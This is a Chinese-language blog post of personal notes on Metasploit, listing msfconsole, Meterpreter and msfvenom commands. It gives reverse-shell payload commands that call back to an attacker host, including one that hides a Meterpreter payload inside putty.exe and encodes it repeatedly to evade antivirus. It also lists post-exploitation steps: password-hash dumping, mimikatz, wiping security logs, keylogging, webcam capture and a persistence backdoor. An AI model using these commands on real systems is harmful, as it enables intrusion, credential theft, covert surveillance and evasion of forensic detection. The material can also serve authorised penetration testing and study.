标签:主机名 目标 读取 jpeg cat targe 关键字搜索 编码 详细
back 退出当前的模块
banner 显示一个msf的图像
check 检查当前的目标是否支持该exploits
show options 显示当前exploites的选项
connect 远程连接 ip+ port
edit 在vim中打开当前的exploits 然后进行编辑
exit 退出msfconsole环境
grep 和 linux中的grep一样,从目标中抓取flag,eg:grep http search oracle
info 显示当前exploits的详细信息
irb 进入一个Ruby的交互式shell,可以动态的交互并创建metasploit的脚本
jobs -h 对当前的工作进行操作
kill+jobid 通过job id 来终结某个job
load 从metasploit插件库中加载一些插件
loadpath 通过path来添加一些第三方的插件到metasploit中
unload 卸载
resource 通过msfconsole加载一些源代码并运行,也可以用来执行一些批量的脚本
route 添加路由功能
search 搜索一些你想知道的模块或者exploit或者
help search 查看 search的帮助
search name:通过name 来进行关键字搜索
search platform:通过平台来缩小搜索范围
search type:通过类型来缩小范围,such as auxiliary,post,exploit,etc
search author:通过你喜爱的作者来搜索
search name: author: platform:搜索时可以多选项缩小范围
session 会话管理 session-l 可以列个列表
session -i id 可以连接id对应的session 并且出现一个可交互的shell
set 为当前的模块哦欸之option和parameters
unset 移除自己配置的parameters
setg/unsetg 设置/移除全局变量,创建一个全局变量可以节省自己的时间
save 将当前的配置和属性保存下来
auxiliary 辅助模块(scanner,denial of service modules,fuzzers)
exploits 攻击模块,metasploit的核心,保存了各种漏洞
payloads 有效载荷
在利用模块中show targets 会显示哪些目标是受支持的
show advanced 显示高级选项
show nops 显示metasploit提供的nop生成器
stager 在攻击者和受害者之间建立一个通信信道,在一个阶段有效负载中读取远程主机
meterpreter 通过dll注入操作,完全驻留在内存中,不在硬盘上留下痕迹所以传统的取证难以发现
PassiveX可以帮助绕过限制的出站防火墙。它通过使用ActiveX控件创建一个隐藏的Internet Explorer实例来实现这一点。通过使用新的ActiveX控件,它通过HTTP请求和响应与攻击者进行通信。
NoNx 用来规避DEP,在某些cpu中存在DEP,防止代码在内存的某些区域运行
Reflective DLL injection 反射式DLL注入,将阶段有效载荷注入到内存中运行的主机进程中,而不触及主机硬盘。VNC和Meterpreter都使用了反射式dll注入
在没有任何命令的情况下生成Shellcode只需要直接使用generate,
使用generate -b ‘/x00/‘可以删除空字符,有效缩小shellcode的大小
background 在Meterpreter 和msf之间切换
clearev 清除Windows系统中的应用信息和安全日志。无选项和参数
download 下载远程文件,在下载windows系统下的文件时,注意双斜线
edit 用vi打开文件并编辑
execute 在目的机器上打开一个命令行。execute -f cmd.exe -I -h
getuid 显示在Meterpreter服务器上运行的用户
hashdump 转储SAM数据库的数据
idletime 显示远程机器上的用户的空闲时间
lpwd 显示当前的Meterpreter的运行路径
lcd 直接在Meterpreter中切换你的工作目录,使得可以直接访问目的路径的文件
ps 显示目标机器上正在运行的进程
search 可以搜索目标机器的文件,可以搜索整个系统,也可以制定文件夹,可使用通配符
shell 提供一个目标机器上的原生的shell
upload 可以上传文件或文件夹到目标机器
webcam_list 从Meterpreter shell中运行,可以显示目标机器上的可用的网络摄像头
webcam_snap 利用当前的目标机器的可用的网络摄像头来截图成jpeg 并保存。
Execute 在目标机器中执行文件
getwd 获取当前目标机器的工作目录,也可以获得当前系统的工作目录
download 从目标机器上下载或者文件到攻击机
route 查看路由
protfwd meterfreter内嵌的端口转发器
ps 通过ps查看进程
migrate +pid可以将meterpreter会话从一个进程移植到另一个进程的内存空间。这样只要这个进程不结束,meterpreter会话就不会关闭。
下面的语句都在Meterpreter环境中
Python_execute +python语句 来实现python的使用
Python_execute “import os ;cd=os.getpwd()” -r cd 。用-r 可以实现对当前变量的打印
Python_import -f +path 用来在meterpreter中引入python文件,使用-f来指定文件
RHOSTS可以设定ip的范围,CIDR范围和以逗号分割的多个范围以及以行分割的主机列表文件
THREADS 为扫描仪的并发线程数 默认为1,但是有具体的规则:在win32系统上时保持在16以下,在Cygwin 下要保持在200一下,类Linux系统中可以threads高于256
db_nmap 使用nmap 扫描并将扫描结果保存在database中
nmap-oA 来运行nmap 扫描 会将结果生成三个输出文件,然后用db_import来填充数据库
search portscan 来搜索msf框架中可用的portscanner
auxiliary/scanner/smb/snb_version 可以用来探测目标机器上的操作系统版本 和主机名
auxiliary/scanner/ip/ipidseq 扫描目前网络中的空闲主机,利用该空闲主机来扫描其他主机,利用僵尸机达到自己隐身的目的
在ipidseq环境中使用nmap+参数+僵尸IP+目的ip来达到使用僵尸发起nmap扫描的目的
先使用 auxiliary/scanner/mssql/mssql_ping 设置参数后 进行发现 若发现存活的mssql服务器则可以使用auxiliary/admin/mssql/mssql_exec来进行exploit。也可以使用THC-Hydra和medusa等工具进行暴力破解
SSH服务发现 port(22)、FTP服务 port(21)
所有的模块都位于data/exploits/psnuffle中,名称与psnuffle使用的协议名称想对应,通常使用正则表达式
在metasploit中有SNMP辅助模块,metasploit有一个专用于清楚SNMP设备的内置辅助模块。在执行前需要修改/etc/default/snmpd中的SNMPDOPTS=‘-Lsd -Lf /dev/null -u snmp -I -smux -p /var/run/snmpd.pid 127.0.0.1‘
127.0.0.1修改位0.0.0.0,这是因为默认只扫描本地的snmp .然后重启服务
当进行SNMP查询时,存在MIB API ,MIB 是管理信息库,该界面允许查询设备并提取信息,metasploit默认加载了数据库中的MIB列表
Search snmp 来查看可利用的snmp 扫描模块
后续 详细
必要的选项 -p 和 -f
-p指定payload 需要在后跟上参数 lhost=… lport=..等等 ,具体看options
-f指定payload的输出格式
-b会自动调用编码器
-e使用编码模块
-i 后跟迭代次数 进行多次编码,某些情况下迭代编码可以起到规避杀毒软件
Msfvenom –help-formats 查看msf支持的输出格式
Msfvenom -l payloads 列出payloads清单
Msfvenom -l encoder 列出编码方法
Msfvenom -l nops 空字段模块/为了绕过和免杀
反弹回meterpreter会话的payload:
Msfvenom -p windows/meterpreter/reverse_tcp LOST=自己的ip LPORT=444 -f exe -o payload.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -a x86 --platform windows -e x86/shikata_ga_nai -i 3 -x /root/下载/putty.exe -k -f exe -o /root/桌面/putty_evil.exe
getudid 获取当前用户id getsystem
Use post/windows/gather/enum_domain
Load minikatz
Windows/gather/hashdump
Clearev
Metsvc
Exploit/multi/hander
Payload windows/metsvc_bind_tcp
Persistence 自启动安装 会留一个后门,并且添加进启动项
Keyscan_start
Keyscan_dump
Keyscan_stop
Use espia
Screen
Screenrab
metasploit常用的一些命令,来自对官方文档自己的理解
标签:主机名 目标 读取 jpeg cat targe 关键字搜索 编码 详细
原文地址:https://www.cnblogs.com/poise/p/9065950.html